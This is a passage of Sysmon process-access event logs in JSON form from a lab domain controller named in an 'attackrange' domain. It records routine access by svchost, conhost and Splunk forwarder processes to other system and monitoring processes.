06:56:58.980","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6385,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:58.980\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:58.980","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6386,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:58.980\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:58.980","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6387,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:58.980\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:58.980","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6388,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:58.980\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:58.980","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6389,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:58.980\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:58.980","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6390,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:58.980\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:58.980","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6391,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:58.980\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-123A-5F25-0000-0010F1380900}\r\nTargetProcessId: 5052\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:58.980","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-123A-5F25-0000-0010F1380900}","TargetProcessId":"5052","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6392,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:59.105\r\nSourceProcessGUID: {E2A3D6B1-123A-5F25-0000-0010F1380900}\r\nSourceProcessId: 5052\r\nSourceThreadId: 4564\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:59.105","SourceProcessGUID":"{E2A3D6B1-123A-5F25-0000-0010F1380900}","SourceProcessId":"5052","SourceThreadId":"4564","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
